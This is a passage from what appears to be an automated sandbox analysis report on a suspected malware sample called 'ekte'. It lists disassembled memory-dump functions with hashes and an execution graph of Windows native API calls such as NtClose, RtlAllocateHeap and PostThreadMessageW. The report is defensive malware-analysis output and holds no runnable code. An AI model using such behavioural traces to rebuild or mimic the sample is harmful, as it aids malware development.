                                                                                                    Function 00CA03A8 Relevance: .0, Instructions: 22COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6bac6223d4ccbb9fada2c83f6e6ce49631dcd87122a80f9b91a4bb65f7ba0b3c
                                                                                                    • Instruction ID: 3a00fcb99acb20c86db8a430fd28fc45e3e21ba1841cdfbba0736c78b634e04b
                                                                                                    • Opcode Fuzzy Hash: 6bac6223d4ccbb9fada2c83f6e6ce49631dcd87122a80f9b91a4bb65f7ba0b3c
                                                                                                    • Instruction Fuzzy Hash: C5E04F3480B398DFCB16EBA4A55019CBF749F4A745F6001EAC4409B2A1D7358F5ED752
                                                                                                    Function 00CA2196 Relevance: .0, Instructions: 21COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f71fd10f1516b1e6b30e05435d0437fb7793581c6687afb08884dc68ebe1214f
                                                                                                    • Instruction ID: 4f67bc0faafc5002a7cfc1cb55d1174a05e03857f2318c9e58fe1f6c31e79a0a
                                                                                                    • Opcode Fuzzy Hash: f71fd10f1516b1e6b30e05435d0437fb7793581c6687afb08884dc68ebe1214f
                                                                                                    • Instruction Fuzzy Hash: AEE01AB59441189FEB40CF64CC84BE8BBB5EB49314F2440D9E90DE3250C7369E86CF14
                                                                                                    Function 00CA09A4 Relevance: .0, Instructions: 21COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 82bd802f5ff9887dc661d21151dceb56c89d4ed5131be3e7b18edf5274d0e864
                                                                                                    • Instruction ID: 28e1d9383da832e787224f5d7c91f3707afa0e51b18ae16ed339830c00be3805
                                                                                                    • Opcode Fuzzy Hash: 82bd802f5ff9887dc661d21151dceb56c89d4ed5131be3e7b18edf5274d0e864
                                                                                                    • Instruction Fuzzy Hash: DDE04F34A49109CBC740CF20D944BBDB376AB4B344F306140D00E63782CA315D82DF44
                                                                                                    Function 00CA205C Relevance: .0, Instructions: 21COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9565b87f20060afb82830c98c3575eb44773cd42757093c81a7908470ca91d61
                                                                                                    • Instruction ID: fbcff6743111bfb8221e046acc7db51686f7062c10636d92de44206101c33677
                                                                                                    • Opcode Fuzzy Hash: 9565b87f20060afb82830c98c3575eb44773cd42757093c81a7908470ca91d61
                                                                                                    • Instruction Fuzzy Hash: 7FF01C35800655CFCB60CF64C9845ECBBB5BB85324F2442DA841997395D7359E85DF00
                                                                                                    Function 00CA07D8 Relevance: .0, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3ea59de8b211494aa969e811c1280d6b8b165913706ce157c2ae46c8a1b38c65
                                                                                                    • Instruction ID: c2a5f541dfb8df31dfc2ce9991c0e52f431c2e3d647d8356e10bbb14818ceb2d
                                                                                                    • Opcode Fuzzy Hash: 3ea59de8b211494aa969e811c1280d6b8b165913706ce157c2ae46c8a1b38c65
                                                                                                    • Instruction Fuzzy Hash: C9D05B30C8D109DBC704DBA4D5515BDB77C9786344F305298D80973241D6703E41EA55
                                                                                                    Function 00CA12A8 Relevance: .0, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 14b6c8cd20bce04e428ee86b7ed31b934c9082ebf137a1be5db2fb2ee18ab3fa
                                                                                                    • Instruction ID: e89f3d53548bcb8cf0e9c6cf28c94cb62cb1d96a0acd411e65fd752e612e8775
                                                                                                    • Opcode Fuzzy Hash: 14b6c8cd20bce04e428ee86b7ed31b934c9082ebf137a1be5db2fb2ee18ab3fa
                                                                                                    • Instruction Fuzzy Hash: 98E02670D18248DFDF10DBB8E95139CBFF0AB46302F2001EAC804E72A0E6308B44CB01
                                                                                                    Function 00CA10D0 Relevance: .0, Instructions: 18COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7e3780958eb9049eec1f5977264f68dacee9a7a5b3e9526ed1056f97f88965c7
                                                                                                    • Instruction ID: f9fa4bd3b9994ea3ea3df202a699a9bbb7f546df825d09187746e7398f2e72f9
                                                                                                    • Opcode Fuzzy Hash: 7e3780958eb9049eec1f5977264f68dacee9a7a5b3e9526ed1056f97f88965c7
                                                                                                    • Instruction Fuzzy Hash: F7E0EC74914208DFC744DFB8D58465CBBF4EB49315F2041E9D908D7360E7319E84DB41
                                                                                                    Function 00CA1198 Relevance: .0, Instructions: 17COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 107b0eab796240dbd1fd6777eb02c78f4e18bf10e9d8474e304da1336111975f
                                                                                                    • Instruction ID: d92fb54f5b5215d649553cf9e7cb397f8f5cf906eb451c11f1ccd695bc77fbfb
                                                                                                    • Opcode Fuzzy Hash: 107b0eab796240dbd1fd6777eb02c78f4e18bf10e9d8474e304da1336111975f
                                                                                                    • Instruction Fuzzy Hash: EAD05E34849208EBC704DFA4E9416ADBBBCAB86304F2052A8DD0433250C6342F84D795
                                                                                                    Function 00CA03F8 Relevance: .0, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4dee6a73cb4f576abc857551f333fc0b14ceb378cc19e07e9913c786b8bacf82
                                                                                                    • Instruction ID: 0ff43c77aa6be538ec82046dc7cf66b02eeed7fa10600aa3b6633ee77e4061ea
                                                                                                    • Opcode Fuzzy Hash: 4dee6a73cb4f576abc857551f333fc0b14ceb378cc19e07e9913c786b8bacf82
                                                                                                    • Instruction Fuzzy Hash: 7ED01730D1420CEFCB44EFB8D94529DBBB4AB88300F2001B98848A7240E7306B80DB91
                                                                                                    Function 00CA1898 Relevance: .0, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f1dbcec936205499ab44c19f0695316ca3de03aa266e6bf122f68d12c18ec926
                                                                                                    • Instruction ID: 2a657ddea2a9b806fc30bf64e48c19db778043d23b686e96f577a8431ab0d7e9
                                                                                                    • Opcode Fuzzy Hash: f1dbcec936205499ab44c19f0695316ca3de03aa266e6bf122f68d12c18ec926
                                                                                                    • Instruction Fuzzy Hash: BCD05E3080920CEFC708DFA8EA4555DBBB9BB86301F1053A8D80423290CB301F84DB8A
                                                                                                    Function 00CA0090 Relevance: .0, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b64b5ba29bf747395806fda243e285cfbcd5296c607d65435a71450c5d5cf538
                                                                                                    • Instruction ID: 63e8353ddc3c920b4d1fd8ca69faa289de6b71776cdb74134d2c875c157b2346
                                                                                                    • Opcode Fuzzy Hash: b64b5ba29bf747395806fda243e285cfbcd5296c607d65435a71450c5d5cf538
                                                                                                    • Instruction Fuzzy Hash: 30E0EC34D0820CEBCB14DFA4E5552ACBBB4AB85311F2082AAD85462390D7745B40DB95
                                                                                                    Function 00CA12B8 Relevance: .0, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 998199422f5dbc35376e4de3b874b47429bc9e07fcd15843ae33b16a3ecbc9f4
                                                                                                    • Instruction ID: 392942180dd81fa2c4a2328b6ac8ec9149e5e201d0635228a26a1264ecd4e77e
                                                                                                    • Opcode Fuzzy Hash: 998199422f5dbc35376e4de3b874b47429bc9e07fcd15843ae33b16a3ecbc9f4
                                                                                                    • Instruction Fuzzy Hash: 04D01730D14208EFCB44EFA8E94539DBBF8AB44301F2042A98808A3340E6309B80CB81
                                                                                                    Function 00CA1321 Relevance: .0, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0c906ba80a5d7a847be55e84d84350b37cd9515d474b85fe794a2d54a80a3aa2
                                                                                                    • Instruction ID: 290a50bf68a5f986d1af6344799f7c8c8c3405c8d4db7b42083be69fdf3e0fe9
                                                                                                    • Opcode Fuzzy Hash: 0c906ba80a5d7a847be55e84d84350b37cd9515d474b85fe794a2d54a80a3aa2
                                                                                                    • Instruction Fuzzy Hash: EAD05EB0E4A109AFDB28CAA4B953BADBF6C87D1306F10129E8805526B1E6310A14DA82
                                                                                                    Function 00CA1330 Relevance: .0, Instructions: 13COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c59574f8489bf0262f7d37029fb058aedc16a32b34a91390aca714d8eac28c9b
                                                                                                    • Instruction ID: e44995e0b04e6c2700c433677d5ae84d15a90f06e1fb8085aaa043ac15c20958
                                                                                                    • Opcode Fuzzy Hash: c59574f8489bf0262f7d37029fb058aedc16a32b34a91390aca714d8eac28c9b
                                                                                                    • Instruction Fuzzy Hash: 29C0123091610CDBCB14DF95D916B6DBB6CD7C1315F50119D980813250DA311E40D796
                                                                                                    Function 00CA0DF4 Relevance: .0, Instructions: 11COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 72d4fdf727144098ff38702abea75c1b09e70900e25ead7edba668f052e1b19b
                                                                                                    • Instruction ID: 0dc841f1de8e96bbad0befaf13d0cd9261685d5f9bed3c2dbc365805f79df9cd
                                                                                                    • Opcode Fuzzy Hash: 72d4fdf727144098ff38702abea75c1b09e70900e25ead7edba668f052e1b19b
                                                                                                    • Instruction Fuzzy Hash: 26C09B35A45108DFCB149BC5FD050FCB735DBCB377F111061D70EA341187205A649741

                                                                                                    Non-executed Functions

                                                                                                    Function 001BDB48 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ``[T
                                                                                                    • API String ID: 0-1744630349
                                                                                                    • Opcode ID: 22f196d8afd397a80974257607ea4a574d6fc395dc31887c88ccc4edd7f44982
                                                                                                    • Instruction ID: 1b9233b29d070f2e260cfa7be5af0cc6ac95082dbb8f5ae5bbcf86e27589ec1d
                                                                                                    • Opcode Fuzzy Hash: 22f196d8afd397a80974257607ea4a574d6fc395dc31887c88ccc4edd7f44982
                                                                                                    • Instruction Fuzzy Hash: 79E11974E005598FDB14DFA9C5809ADFBB2FF89304F24816AD815AB356DB30AD42CFA0
                                                                                                    Function 001BD2D8 Relevance: .3, Instructions: 312COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cb35d5250da17eaa50765d331ddd8425c5ec5d76173407e59ac4c108bb08df9e
                                                                                                    • Instruction ID: 39dd5be6089a4aebf82bf2148db0046da45d31f4eb93e0920a2b9bd21b6d8653
                                                                                                    • Opcode Fuzzy Hash: cb35d5250da17eaa50765d331ddd8425c5ec5d76173407e59ac4c108bb08df9e
                                                                                                    • Instruction Fuzzy Hash: F1E11A74E001598FDB18DFA9D5809ADFBB2FF89304F24816AD815AB356DB34AD42CF60
                                                                                                    Function 001BE6D0 Relevance: .3, Instructions: 312COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e44f10589f4e9979b18511e0305b8b943fcbe82ff40ad5f4b62cdee3f96126c7
                                                                                                    • Instruction ID: 7b8cd8388698de26cdc7ecb6d80d8698393620d4f0c91a7ba14d75b5aafd5e2e
                                                                                                    • Opcode Fuzzy Hash: e44f10589f4e9979b18511e0305b8b943fcbe82ff40ad5f4b62cdee3f96126c7
                                                                                                    • Instruction Fuzzy Hash: DBE10774E001598FDB14DFA8C5809AEFBF2BF89304F24816AD815AB356DB35A942CF60
                                                                                                    Function 001BD710 Relevance: .3, Instructions: 312COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d280cb2bd1037df51f127e2bbe07830df20d0923f434de255527253c56f490fd
                                                                                                    • Instruction ID: 86c809fd76e18f25bcf22a46c009a17b10d0977f5a962c99f3e2318c10aef5dd
                                                                                                    • Opcode Fuzzy Hash: d280cb2bd1037df51f127e2bbe07830df20d0923f434de255527253c56f490fd
                                                                                                    • Instruction Fuzzy Hash: C2E11974E001598FDB14DFA9D580AADFBB2FF89304F24816AD815AB356DB34AD42CF60
                                                                                                    Function 001BEB08 Relevance: .3, Instructions: 312COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1976b11c9e623696385be948e39ddee23e648a7ba1513fadcd7bcbc70dc791bf
                                                                                                    • Instruction ID: d97fd38897afcf13e2509cebd75634954e5e64efbe657d7839ae59f473b3d542
                                                                                                    • Opcode Fuzzy Hash: 1976b11c9e623696385be948e39ddee23e648a7ba1513fadcd7bcbc70dc791bf
                                                                                                    • Instruction Fuzzy Hash: 3DE10874E001198FDB14DFA9C5809AEFBF2BF89304F24816AD815AB356DB35AD42CF61
                                                                                                    Function 001B2A68 Relevance: .3, Instructions: 283COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: af92bb87cf32d0e9e2b4f2ce2202d05af1c46dbb4b543076a75da52252dfcc02
                                                                                                    • Instruction ID: 0799f321969d632c83037072e70d2d7c9c0c7f0019b8febad80446539cd082e6
                                                                                                    • Opcode Fuzzy Hash: af92bb87cf32d0e9e2b4f2ce2202d05af1c46dbb4b543076a75da52252dfcc02
                                                                                                    • Instruction Fuzzy Hash: 27D1F870E01228CFDB14DFA9C890BDDFBB2BF99300F248599D418A7256D7749A85CF51
                                                                                                    Function 001BD2BD Relevance: .1, Instructions: 141COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b443af5eadf26f901fc527b295f6c8f273e66a202aa0b8b33fce38f8bcdcca44
                                                                                                    • Instruction ID: 218a747645835a0e1a9d85390012cf9128a29981dde956f39a4e42b42f49e2b0
                                                                                                    • Opcode Fuzzy Hash: b443af5eadf26f901fc527b295f6c8f273e66a202aa0b8b33fce38f8bcdcca44
                                                                                                    • Instruction Fuzzy Hash: 90514C74E042598FDB14DFA9C5805AEFBF2FF89300F2481AAD409AB256D7309D46CFA1
                                                                                                    Function 001B44C9 Relevance: .1, Instructions: 110COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b4b10be190d95c6c5933f404bbe5e542ec0f2f7816ec0dbd2cfc2469e16c62a0
                                                                                                    • Instruction ID: 568fd336b8aed904a0f3cc8965ed7cdb14c63b166a58a5aa8a924e311f62aa57
                                                                                                    • Opcode Fuzzy Hash: b4b10be190d95c6c5933f404bbe5e542ec0f2f7816ec0dbd2cfc2469e16c62a0
                                                                                                    • Instruction Fuzzy Hash: 74419875E056188FEB28CF66DC506DEBBF3AFC9300F14C1AAD409A7255EB305A858F51
                                                                                                    Function 00CA1E3F Relevance: .0, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.376283756.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_ca0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d2f9d4a48d64b4a9f492b10f4c1dda6ff1956384edf064296b90f8266f269a95
                                                                                                    • Instruction ID: 5b4cb0f5e467368253b4741a73bc6c3f20ec9e1a17d2d7fc800e0eb7d16a848f
                                                                                                    • Opcode Fuzzy Hash: d2f9d4a48d64b4a9f492b10f4c1dda6ff1956384edf064296b90f8266f269a95
                                                                                                    • Instruction Fuzzy Hash: 51C04C2599E025D685100A8AE4040F8F73CD78B27BF203551951EE3422821152556645

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:1.5%
                                                                                                    Dynamic/Decrypted Code Coverage:3.6%
                                                                                                    Signature Coverage:5.8%
                                                                                                    Total number of Nodes:137
                                                                                                    Total number of Limit Nodes:11
                                                                                                    execution_graph 77606 424863 77607 42487f 77606->77607 77608 4248a7 77607->77608 77609 4248bb 77607->77609 77610 42c483 NtClose 77608->77610 77616 42c483 77609->77616 77612 4248b0 77610->77612 77613 4248c4 77619 42e663 RtlAllocateHeap 77613->77619 77615 4248cf 77617 42c4a0 77616->77617 77618 42c4b1 NtClose 77617->77618 77618->77613 77619->77615 77620 42f703 77621 42f713 77620->77621 77622 42f719 77620->77622 77625 42e623 77622->77625 77624 42f73f 77628 42c7a3 77625->77628 77627 42e63e 77627->77624 77629 42c7bd 77628->77629 77630 42c7ce RtlAllocateHeap 77629->77630 77630->77627 77726 42ba73 77727 42ba90 77726->77727 77730 9afdc0 LdrInitializeThunk 77727->77730 77728 42bab8 77730->77728 77731 42f833 77732 42f7a3 77731->77732 77733 42e623 RtlAllocateHeap 77732->77733 77736 42f800 77732->77736 77734 42f7dd 77733->77734 77735 42e543 RtlFreeHeap 77734->77735 77735->77736 77737 424bf3 77742 424c0c 77737->77742 77738 424c9c 77739 424c54 77740 42e543 RtlFreeHeap 77739->77740 77741 424c64 77740->77741 77742->77738 77742->77739 77743 424c97 77742->77743 77744 42e543 RtlFreeHeap 77743->77744 77744->77738 77745 428a93 77746 428af8 77745->77746 77747 428b2f 77746->77747 77750 4242a3 77746->77750 77749 428b11 77752 4242ac 77750->77752 77751 424266 77751->77749 77752->77751 77753 424433 77752->77753 77754 424448 77752->77754 77756 42c483 NtClose 77753->77756 77755 42c483 NtClose 77754->77755 77759 424451 77755->77759 77757 42443c 77756->77757 77757->77749 77758 424488 77758->77749 77759->77758 77760 42e543 RtlFreeHeap 77759->77760 77761 42447c 77760->77761 77761->77749 77631 413e43 77632 413e5d 77631->77632 77633 413ec0 77632->77633 77634 413eaf PostThreadMessageW 77632->77634 77634->77633 77762 41b173 77763 41b1b7 77762->77763 77764 41b1d8 77763->77764 77765 42c483 NtClose 77763->77765 77765->77764 77766 413917 77767 4138e1 77766->77767 77768 413927 77766->77768 77771 42c703 77767->77771 77772 42c71d 77771->77772 77775 9afb68 LdrInitializeThunk 77772->77775 77773 4138f5 77775->77773 77635 418bc8 77636 42c483 NtClose 77635->77636 77637 418bd2 77636->77637 77638 401ba9 77639 401bb0 77638->77639 77642 42fbd3 77639->77642 77645 42e0f3 77642->77645 77646 42e119 77645->77646 77657 407403 77646->77657 77648 42e12f 77656 401c3d 77648->77656 77660 41af83 77648->77660 77650 42e163 77671 428143 77650->77671 77651 42e14e 77651->77650 77675 42c843 77651->77675 77654 42e17d 77655 42c843 ExitProcess 77654->77655 77655->77656 77659 407410 77657->77659 77678 4162b3 77657->77678 77659->77648 77661 41afaf 77660->77661 77700 41ae73 77661->77700 77664 41aff4 77666 41b010 77664->77666 77669 42c483 NtClose 77664->77669 77665 41afdc 77667 41afe7 77665->77667 77668 42c483 NtClose 77665->77668 77666->77651 77667->77651 77668->77667 77670 41b006 77669->77670 77670->77651 77672 4281a5 77671->77672 77674 4281b2 77672->77674 77711 418473 77672->77711 77674->77654 77676 42c860 77675->77676 77677 42c871 ExitProcess 77676->77677 77677->77650 77679 4162d0 77678->77679 77681 4162e9 77679->77681 77682 42ced3 77679->77682 77681->77659 77684 42ceed 77682->77684 77683 42cf1c 77683->77681 77684->77683 77689 42bac3 77684->77689 77690 42bae0 77689->77690 77696 9afae8 LdrInitializeThunk 77690->77696 77691 42bb0c 77693 42e543 77691->77693 77697 42c7f3 77693->77697 77695 42cf95 77695->77681 77696->77691 77698 42c810 77697->77698 77699 42c821 RtlFreeHeap 77698->77699 77699->77695 77701 41af69 77700->77701 77702 41ae8d 77700->77702 77701->77664 77701->77665 77706 42bb63 77702->77706 77705 42c483 NtClose 77705->77701 77707 42bb80 77706->77707 77710 9b07ac LdrInitializeThunk 77707->77710 77708 41af5d 77708->77705 77710->77708 77713 41849d 77711->77713 77712 4189ab 77712->77674 77713->77712 77719 413ab3 77713->77719 77715 4185ca 77715->77712 77716 42e543 RtlFreeHeap 77715->77716 77717 4185e2 77716->77717 77717->77712 77718 42c843 ExitProcess 77717->77718 77718->77712 77723 413ad3 77719->77723 77721 413b3c 77721->77715 77722 413b32 77722->77715 77723->77721 77724 41b293 RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 77723->77724 77724->77722 77725 9af9f0 LdrInitializeThunk

                                                                                                    Executed Functions

                                                                                                    Function 0042C483 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 234 42c483-42c4bf call 404783 call 42d6c3 NtClose
                                                                                                    APIs
                                                                                                    • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C4BA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_400000_ekte.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Close
                                                                                                    • String ID:
                                                                                                    • API String ID: 3535843008-0
